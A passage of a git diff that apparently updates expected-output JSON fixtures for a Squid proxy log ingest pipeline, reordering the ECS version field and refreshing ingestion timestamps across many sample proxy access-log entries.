] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689357.720 2831 10.105.33.214 TCP_MISS/200 21152 GET http://insider.msg.yahoo.com/ycontent/? adeolaegbedokun DIRECT/68.142.194.14 text/xml", "event": { - "ingested": "2021-06-08T12:14:41.662261400Z" + "ingested": "2021-12-14T14:55:08.315645009Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689358.173 1 10.105.37.17 TCP_DENIED/407 1667 CONNECT us.mcafee.com:443 - NONE/- text/html", "event": { - "ingested": "2021-06-08T12:14:41.662265300Z" + "ingested": "2021-12-14T14:55:08.315645345Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689358.174 0 10.105.37.17 TCP_DENIED/407 1767 POST http://us.mcafee.com/apps/agent/submgr/appinstru.asp - NONE/- text/html", "event": { - "ingested": "2021-06-08T12:14:41.662269200Z" + "ingested": "2021-12-14T14:55:08.315645678Z" }, - "tags": [ + "ecs": { + "version": "1.12.0" + }, + "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689358.174 0 10.105.37.17 TCP_DENIED/407 1761 POST http://us.mcafee.com/apps/agent/submgr/appsync.asp - NONE/- text/html", "event": { - "ingested": "2021-06-08T12:14:41.662273Z" + "ingested": "2021-12-14T14:55:08.315646009Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689358.226 0 10.105.37.17 TCP_DENIED/407 1667 CONNECT us.mcafee.com:443 - NONE/- text/html", "event": { - "ingested": "2021-06-08T12:14:41.662276800Z" + "ingested": "2021-12-14T14:55:08.315646351Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689358.486 711 10.105.33.214 TCP_REFRESH_HIT/304 512 GET http://radio.launch.yahoo.com/radio/clientdata/538/images/btn_stations.gif adeolaegbedokun DIRECT/68.142.219.132 -", "event": { - "ingested": "2021-06-08T12:14:41.662281100Z" + "ingested": "2021-12-14T14:55:08.315646679Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689358.683 0 10.105.37.17 TCP_DENIED/407 1667 CONNECT us.mcafee.com:443 - NONE/- text/html", "event": { - "ingested": "2021-06-08T12:14:41.662284800Z" + "ingested": "2021-12-14T14:55:08.315647017Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689359.199 713 10.105.33.214 TCP_REFRESH_HIT/304 512 GET http://radio.launch.yahoo.com/radio/clientdata/538/images/btn_stations_over.gif adeolaegbedokun DIRECT/68.142.219.132 -", "event": { - "ingested": "2021-06-08T12:14:41.662288200Z" + "ingested": "2021-12-14T14:55:08.315647352Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689359.269 1982 10.105.33.214 TCP_MISS/200 362 POST http://shttp.msg.yahoo.com/notify/ adeolaegbedokun DIRECT/216.155.194.239 text/plain", "event": { - "ingested": "2021-06-08T12:14:41.662291800Z" + "ingested": "2021-12-14T14:55:08.315647690Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689359.924 725 10.105.33.214 TCP_REFRESH_HIT/304 511 GET http://radio.launch.yahoo.com/radio/clientdata/538/skins/1/images/bg_left.gif adeolaegbedokun DIRECT/68.142.219.132 -", "event": { - "ingested": "2021-06-08T12:14:41.662295300Z" + "ingested": "2021-12-14T14:55:08.315648022Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689360.611 687 10.105.33.214 TCP_REFRESH_HIT/304 512 GET http://radio.launch.yahoo.com/radio/clientdata/538/images/launchcast_radio.gif adeolaegbedokun DIRECT/68.142.219.132 -", "event": { - "ingested": "2021-06-08T12:14:41.662299100Z" + "ingested": "2021-12-14T14:55:08.315648455Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689360.980 1 10.105.47.191 TCP_DENIED/407 1767 POST http://us.mcafee.com/apps/agent/submgr/appinstru.asp - NONE/- text/html", "event": { - "ingested": "2021-06-08T12:14:41.662303Z" + "ingested": "2021-12-14T14:55:08.315648788Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689361.188 1 10.105.47.191 TCP_DENIED/407 1761 POST http://us.mcafee.com/apps/agent/submgr/appsync.asp - NONE/- text/html", "event": { - "ingested": "2021-06-08T12:14:41.662306500Z" + "ingested": "2021-12-14T14:55:08.315649133Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689361.393 783 10.105.33.214 TCP_REFRESH_HIT/304 512 GET http://radio.launch.yahoo.com/radio/clientdata/538/skins/1/images/bg_right.gif adeolaegbedokun DIRECT/68.142.219.132 -", "event": { - "ingested": "2021-06-08T12:14:41.662310300Z" + "ingested": "2021-12-14T14:55:08.315649468Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689361.564 2242 10.105.33.214 TCP_REFRESH_HIT/304 512 GET http://radio.launch.yahoo.com/radio/clientdata/538/skins/1/images/bg_center.gif adeolaegbedokun DIRECT/68.142.219.132 -", "event": { - "ingested": "2021-06-08T12:14:41.662313800Z" + "ingested": "2021-12-14T14:55:08.315649802Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689362.220 827 10.105.33.214 TCP_REFRESH_HIT/304 512 GET http://radio.launch.yahoo.com/radio/clientdata/538/skins/1/images/bg_controls_off.gif adeolaegbedokun DIRECT/68.142.219.132 -", "event": { - "ingested": "2021-06-08T12:14:41.662317400Z" + "ingested": "2021-12-14T14:55:08.315650133Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689362.315 751 10.105.33.214 TCP_REFRESH_HIT/304 512 GET http://radio.launch.yahoo.com/radio/common_radio/resources/images/t.gif adeolaegbedokun DIRECT/68.142.219.132 -", "event": { - "ingested": "2021-06-08T12:14:41.662321Z" + "ingested": "2021-12-14T14:55:08.315650465Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689362.318 3 10.105.33.214 TCP_IMS_HIT/304 218 GET http://radio.launch.yahoo.com/radio/clientdata/538/images/btn_off_state_station.gif adeolaegbedokun NONE/- image/gif", "event": { - "ingested": "2021-06-08T12:14:41.662324600Z" + "ingested": "2021-12-14T14:55:08.315650791Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689362.332 13 10.105.33.214 TCP_IMS_HIT/304 218 GET http://radio.launch.yahoo.com/radio/clientdata/538/skins/1/images/bg_controls_fill.gif adeolaegbedokun NONE/- image/gif", "event": { - "ingested": "2021-06-08T12:14:41.662328100Z" + "ingested": "2021-12-14T14:55:08.315651124Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689362.341 8 10.105.33.214 TCP_HIT/200 2263 GET http://us.i1.yimg.com/us.yimg.com/i/us/toolbar50x50.gif adeolaegbedokun NONE/- image/gif", "event": { - "ingested": "2021-06-08T12:14:41.662331600Z" + "ingested": "2021-12-14T14:55:08.315651459Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689363.423 6517 10.105.21.199 TCP_REFRESH_MISS/200 17396 GET http://newsrss.bbc.co.uk/rss/newsonline_world_edition/front_page/rss.xml badeyek DIRECT/212.58.226.33 application/xml", "event": { - "ingested": "2021-06-08T12:14:41.662335100Z" + "ingested": "2021-12-14T14:55:08.315651791Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689364.361 2140 10.105.33.214 TCP_MISS/200 407 GET http://insider.msg.yahoo.com/ycontent/beacon.php adeolaegbedokun DIRECT/68.142.231.252 image/gif", "event": { - "ingested": "2021-06-08T12:14:41.662338700Z" + "ingested": "2021-12-14T14:55:08.315652122Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689364.402 7 10.105.33.214 TCP_IMS_HIT/304 219 GET http://us.ent1.yimg.com/images.launch.yahoo.com/000/032/457/32457654.jpg adeolaegbedokun NONE/- image/jpeg", "event": { - "ingested": "2021-06-08T12:14:41.662342700Z" + "ingested": "2021-12-14T14:55:08.315652464Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689364.411 8 10.105.33.214 TCP_HIT/200 10593 GET http://us.news1.yimg.com/us.yimg.com/p/ap/20060906/thumb.71d29ded334347c48ac88433d033c9a9.pakistan_bin_laden_nyol440.jpg adeolaegbedokun NONE/- image/jpeg", "event": { - "ingested": "2021-06-08T12:14:41.662346200Z" + "ingested": "2021-12-14T14:55:08.315652797Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689365.312 2420 10.105.33.214 TCP_MISS/302 1270 POST http://radio.launch.yahoo.com/radio/play/authplay.asp adeolaegbedokun DIRECT/68.142.219.132 text/html", "event": { - "ingested": "2021-06-08T12:14:41.662349800Z" + "ingested": "2021-12-14T14:55:08.315653135Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689366.377 1966 10.105.33.214 TCP_MISS/200 10519 GET http://us.news1.yimg.com/us.yimg.com/p/ap/20060908/thumb.443f57762d7349669f609fbf0c97a5f1.academy_awards_host_cacp101.jpg adeolaegbedokun DIRECT/213.160.98.159 image/jpeg", "event": { - "ingested": "2021-06-08T12:14:41.662353400Z" + "ingested": "2021-12-14T14:55:08.315653482Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689368.080 1703 10.105.33.214 TCP_MISS/200 515 GET http://radio.music.yahoo.com/radio/player/ymsgr/initstationfeed.asp? adeolaegbedokun DIRECT/68.142.219.132 text/xml", "event": { - "ingested": "2021-06-08T12:14:41.662357Z" + "ingested": "2021-12-14T14:55:08.315653815Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689368.370 3057 10.105.33.214 TCP_MISS/200 14411 GET http://radio.music.yahoo.com/radio/player/ymsgr/initstationfeed.asp? adeolaegbedokun DIRECT/68.142.219.132 text/xml", "event": { - "ingested": "2021-06-08T12:14:41.662360600Z" + "ingested": "2021-12-14T14:55:08.315654149Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689368.889 808 10.105.33.214 TCP_MISS/200 1627 GET http://radio.launch.yahoo.com/radio/play/authplay.asp? adeolaegbedokun DIRECT/68.142.219.132 text/html", "event": { - "ingested": "2021-06-08T12:14:41.662364100Z" + "ingested": "2021-12-14T14:55:08.315654482Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689369.097 1226 10.105.37.65 TCP_DENIED/407 1728 GET http://natrocket.kmip.net:5288/iesocks? - NONE/- text/html", "event": { - "ingested": "2021-06-08T12:14:41.662367700Z" + "ingested": "2021-12-14T14:55:08.315654819Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689369.702 0 10.105.37.65 TCP_DENIED/407 1725 GET http://natrocket.kmip.net:5288/return? - NONE/- text/html", "event": { - "ingested": "2021-06-08T12:14:41.662371400Z" + "ingested": "2021-12-14T14:55:08.315655148Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689370.125 1202 10.105.33.214 TCP_MISS/200 13124 GET http://us.news1.yimg.com/us.yimg.com/p/ap/20060907/thumb.1caf18e56db54eafb16da58356eb3382.amazon_com_online_video_watw101.jpg adeolaegbedokun DIRECT/213.160.98.159 image/jpeg", "event": { - "ingested": "2021-06-08T12:14:41.662375200Z" + "ingested": "2021-12-14T14:55:08.315655493Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689370.862 736 10.105.33.214 TCP_MISS/302 912 GET http://radio.launch.yahoo.com/radio/clientdata/515/starter.asp? adeolaegbedokun DIRECT/68.142.219.132 text/html", "event": { - "ingested": "2021-06-08T12:14:41.662378600Z" + "ingested": "2021-12-14T14:55:08.315655817Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689371.690 828 10.105.33.214 TCP_MISS/200 1450 GET http://radio.launch.yahoo.com/radio/player/default.asp? adeolaegbedokun DIRECT/68.142.219.132 text/html", "event": { - "ingested": "2021-06-08T12:14:41.662382200Z" + "ingested": "2021-12-14T14:55:08.315656154Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689371.987 3617 10.105.33.214 TCP_MISS/200 30432 GET http://us.a2.yimg.com/us.yimg.com/a/ya/yahoo_messenger/081106_lrec_msgr_interophitchhiker.swf? adeolaegbedokun DIRECT/213.160.98.152 application/x-shockwave-flash", "event": { - "ingested": "2021-06-08T12:14:41.662386500Z" + "ingested": "2021-12-14T14:55:08.315656601Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689373.315 1626 10.105.33.214 TCP_MISS/200 14643 GET http://radio.launch.yahoo.com/radio/player/stickwall.asp? adeolaegbedokun DIRECT/68.142.219.132 text/html", "event": { - "ingested": "2021-06-08T12:14:41.662390200Z" + "ingested": "2021-12-14T14:55:08.315656930Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689374.065 2078 10.105.33.214 TCP_MISS/200 425 GET http://us.bc.yahoo.com/b? adeolaegbedokun DIRECT/68.142.213.132 image/gif", "event": { - "ingested": "2021-06-08T12:14:41.662393800Z" + "ingested": "2021-12-14T14:55:08.315657259Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689376.221 2130 10.105.33.214 TCP_MISS/200 407 GET http://insider.msg.yahoo.com/ycontent/beacon.php;_ylc=X1MDNTcwMzAyODMEX3IDMgRldnQDdDAEaW50bAN1cwR2ZXIDNywwLDIsMTIw? adeolaegbedokun DIRECT/68.142.194.14 image/gif", "event": { - "ingested": "2021-06-08T12:14:41.662397600Z" + "ingested": "2021-12-14T14:55:08.315657593Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689377.171 3412 10.105.33.214 TCP_MISS/200 1476 CONNECT pclick.internal.yahoo.com:443 adeolaegbedokun DIRECT/216.109.124.55 -", "event": { - "ingested": "2021-06-08T12:14:41.662401100Z" + "ingested": "2021-12-14T14:55:08.315657928Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689377.191 11 10.105.33.214 TCP_IMS_HIT/304 233 GET http://a1568.g.akamai.net/7/1568/1600/20051025184124/radio.launch.yahoo.com/radioapi/includes/js/compVersionedJS/rapiBridge_1_4.js adeolaegbedokun NONE/- application/x-javascript", "event": { - "ingested": "2021-06-08T12:14:41.662404700Z" + "ingested": "2021-12-14T14:55:08.315658259Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689377.424 1159 10.105.33.214 TCP_MISS/304 236 GET http://a1568.g.akamai.net/7/1568/1600/20040405222754/radio.launch.yahoo.com/radio/clientdata/515/other.css adeolaegbedokun DIRECT/213.160.98.159 text/css", "event": { - "ingested": "2021-06-08T12:14:41.662437100Z" + "ingested": "2021-12-14T14:55:08.315658579Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689378.221 797 10.105.33.214 TCP_MISS/304 238 GET http://a1568.g.akamai.net/7/1568/1600/20040405222757/radio.launch.yahoo.com/radio/clientdata/515/skins/1/images/bg_left.gif adeolaegbedokun DIRECT/213.160.98.159 image/gif", "event": { - "ingested": "2021-06-08T12:14:41.662443100Z" + "ingested": "2021-12-14T14:55:08.315658921Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689378.473 3288 10.105.21.199 TCP_MISS/200 2681 CONNECT login.yahoo.com:443 badeyek DIRECT/209.73.177.115 -", "event": { - "ingested": "2021-06-08T12:14:41.662447400Z" + "ingested": "2021-12-14T14:55:08.315659255Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689378.909 1405 10.105.33.214 TCP_MISS/304 136 GET http://a1568.g.akamai.net/7/1568/1600/20050829181418/radio.launch.yahoo.com/radio/common_radio/resources/images/noaccess_msgr_uk.gif adeolaegbedokun DIRECT/213.160.98.167 -", "event": { - "ingested": "2021-06-08T12:14:41.662452Z" + "ingested": "2021-12-14T14:55:08.315659597Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689378.924 702 10.105.33.214 TCP_MISS/304 237 GET http://a1568.g.akamai.net/7/1568/1600/20040405222757/radio.launch.yahoo.com/radio/clientdata/515/skins/1/images/bg_right.gif adeolaegbedokun DIRECT/213.160.98.159 image/gif", "event": { - "ingested": "2021-06-08T12:14:41.662456Z" + "ingested": "2021-12-14T14:55:08.315659923Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689378.929 4 10.105.33.214 TCP_IMS_HIT/304 218 GET http://a1568.g.akamai.net/7/1568/1600/20040405222807/radio.launch.yahoo.com/radio/common_radio/resources/images/t.gif adeolaegbedokun NONE/- image/gif", "event": { - "ingested": "2021-06-08T12:14:41.662471500Z" + "ingested": "2021-12-14T14:55:08.315660252Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689379.472 563 10.105.33.214 TCP_MISS/304 238 GET http://a1568.g.akamai.net/7/1568/1600/20040405222757/radio.launch.yahoo.com/radio/clientdata/515/skins/1/images/bg_controls_off.gif adeolaegbedokun DIRECT/213.160.98.167 image/gif", "event": { - "ingested": "2021-06-08T12:14:41.662478700Z" + "ingested": "2021-12-14T14:55:08.315660578Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689379.488 560 10.105.33.214 TCP_MISS/304 238 GET http://a1568.g.akamai.net/7/1568/1600/20040405222756/radio.launch.yahoo.com/radio/clientdata/515/skins/1/images/bg_center.gif adeolaegbedokun DIRECT/213.160.98.159 image/gif", "event": { - "ingested": "2021-06-08T12:14:41.662486300Z" + "ingested": "2021-12-14T14:55:08.315660904Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689380.159 685 10.105.33.214 TCP_MISS/304 238 GET http://a1568.g.akamai.net/7/1568/1600/20040405222757/radio.launch.yahoo.com/radio/clientdata/515/skins/1/images/bg_controls_fill.gif adeolaegbedokun DIRECT/213.160.98.167 image/gif", "event": { - "ingested": "2021-06-08T12:14:41.662490800Z" + "ingested": "2021-12-14T14:55:08.315661239Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689381.267 1 10.105.37.180 TCP_DENIED/407 1728 GET http://www.google.com/supported_domains - NONE/- text/html", "event": { - "ingested": "2021-06-08T12:14:41.662494500Z" + "ingested": "2021-12-14T14:55:08.315661567Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689381.659 0 10.105.47.191 TCP_DENIED/407 1782 GET http://us.mcafee.com/apps/agent/en-us/agent5/chknews.asp? - NONE/- text/html", "event": { - "ingested": "2021-06-08T12:14:41.662498200Z" + "ingested": "2021-12-14T14:55:08.315661894Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689381.660 2171 10.105.33.214 TCP_MISS/200 449 GET http://launch.adserver.yahoo.com/l? adeolaegbedokun DIRECT/216.109.125.112 image/gif", "event": { - "ingested": "2021-06-08T12:14:41.662501800Z" + "ingested": "2021-12-14T14:55:08.315662225Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689382.173 3700 10.105.21.199 TCP_MISS/200 11746 GET http://uk.f250.mail.yahoo.com/dc/launch? badeyek DIRECT/217.12.10.96 text/html", "event": { - "ingested": "2021-06-08T12:14:41.662505500Z" + "ingested": "2021-12-14T14:55:08.315662567Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689382.622 1 10.105.37.180 TCP_DENIED/407 1670 CONNECT login.live.com:443 - NONE/- text/html", "event": { - "ingested": "2021-06-08T12:14:41.662509Z" + "ingested": "2021-12-14T14:55:08.315662900Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689384.316 2828 10.105.21.199 TCP_SWAPFAIL_MISS/200 633 GET http://us.js2.yimg.com/us.js.yimg.com/lib/pim/r/dclient/d/js/uk/77cf3e56414f974dfd8616f56f0f632c_1.js badeyek DIRECT/213.160.98.169 application/x-javascript", "event": { - "ingested": "2021-06-08T12:14:41.662512400Z" + "ingested": "2021-12-14T14:55:08.315663243Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689385.714 1397 10.105.21.199 TCP_HIT/200 1742 GET http://us.js1.yimg.com/us.yimg.com/lib/hdr/ygma5.css badeyek NONE/- text/css", "event": { - "ingested": "2021-06-08T12:14:41.662516300Z" + "ingested": "2021-12-14T14:55:08.315663579Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689387.690 1977 10.105.21.199 TCP_MISS/200 14561 GET http://us.js2.yimg.com/us.js.yimg.com/lib/pim/r/dclient/d/js/uk/f7fc76100697c9c2d25dd0ec35e563b0_1.js badeyek DIRECT/213.160.98.169 application/x-javascript", "event": { - "ingested": "2021-06-08T12:14:41.662520100Z" + "ingested": "2021-12-14T14:55:08.315663918Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689387.771 80 10.105.21.199 TCP_HIT/200 68733 GET http://us.js1.yimg.com/us.yimg.com/lib/pim/r/medici/13_15/mail/ac.js badeyek NONE/- application/x-javascript", "event": { - "ingested": "2021-06-08T12:14:41.662523800Z" + "ingested": "2021-12-14T14:55:08.315664251Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689387.830 1 10.105.21.199 TCP_HIT/200 898 GET http://us.js2.yimg.com/us.js.yimg.com/lib/common/utils/2/yahoo_2.0.0-b4.js badeyek NONE/- application/x-javascript", "event": { - "ingested": "2021-06-08T12:14:41.662527700Z" + "ingested": "2021-12-14T14:55:08.315664575Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689387.832 60 10.105.21.199 TCP_HIT/200 26803 GET http://us.i1.yimg.com/us.yimg.com/i/us/pim/dclient/d/img/liam_ball_1.gif badeyek NONE/- image/gif", "event": { - "ingested": "2021-06-08T12:14:41.662531500Z" + "ingested": "2021-12-14T14:55:08.315664906Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" diff --git a/packages/squid/data_stream/log/_dev/test/pipeline/test-generated.log-expected.json b/packages/squid/data_stream/log/_dev/test/pipeline/test-generated.log-expected.json index 451ff9c6a8a..32d6f34f6f7 100644 --- a/packages/squid/data_stream/log/_dev/test/pipeline/test-generated.log-expected.json +++ b/packages/squid/data_stream/log/_dev/test/pipeline/test-generated.log-expected.json @@ -1,1200 +1,1200 @@ { "expected": [ { - "ecs": { - "version": "1.12.0" - }, "message": "10.251.224.219 7337 [29/Jan/2016:6:09:59 nto] \"PROPFIND https://example.org/exercita/der.htm?odoco=ria#min ite\" 10.234.224.44 etdo tation \"quasiarc\" liqua ciade 5699 \"https://example.net/umq/ntium.gif?nes=eab#aliqu\" \"Mozilla/5.0 (Linux; Android 10; SM-A715F Build/QP1A.190711.020; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/83.0.4103.83 Mobile Safari/537.36 [FB_IAB/Orca-Android;FBAV/266.0.0.16.117;]\" deny", "event": { - "ingested": "2021-06-08T12:14:42.230136400Z" + "ingested": "2021-12-14T14:55:10.058060954Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.102.123.34 7178 [12/Feb/2016:1:12:33 nostrud] \"PURGE https://www.example.org/enderitq/sperna.txt?billoi=oreetdol#nidolor tatemU\" 10.70.36.222 estlabo doeiu \"nia\" olupt volup 208 \"https://example.com/eosquir/orsi.txt?itessequ=vol#luptat\" \"Mozilla/5.0 (Linux; Android 10; SM-A305FN Build/QP1A.190711.020; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/78.0.3904.96 Mobile Safari/537.36 YandexSearch/8.10 YandexSearchBrowser/8.10\" deny", "event": { - "ingested": "2021-06-08T12:14:42.230156500Z" + "ingested": "2021-12-14T14:55:10.058063976Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.15.135.248 7269 [26/Feb/2016:8:15:08 mquia] \"OPTIONS https://internal.example.com/aqu/utper.jpg?eFinib=omm#iin proident\" 10.142.172.64 lupt tia \"oloremqu\" temvel iatu 5493 \"https://example.net/dolo/meumfug.gif?roinBCS=ufugiatn#tionulam\" \"Mozilla/5.0 (Linux; Android 8.1.0; SM-A260G Build/OPR6; rv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Rocket/2.1.17(19420) Chrome/81.0.4044.138 Mobile Safari/537.36\" accept", "event": { - "ingested": "2021-06-08T12:14:42.230163200Z" + "ingested": "2021-12-14T14:55:10.058064427Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.44.134.153 5162 [12/Mar/2016:3:17:42 nci] \"GET https://api.example.org/ceroinBC/ratvolup.gif?iatu=ionofde#con uia\" quiavo 1156 \"https://mail.example.com/consec/taliquip.html?radip=tNequ#gelit\" \"Mozilla/5.0 (Linux; Android 9; 5024D_RU Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36 YaApp_Android/10.61 YaSearchBrowser/10.61\" allow 10.81.122.126 taev 160.145000", "event": { - "ingested": "2021-06-08T12:14:42.230168200Z" + "ingested": "2021-12-14T14:55:10.058064890Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.160.95.56 1980 [26/Mar/2016:10:20:16 aqui] \"PUT https://api.example.org/isetq/estqui.gif?magn=equuntu#eos enimad\" 10.171.175.51 boreet onev \"tenima\" laboreet aquaeabi 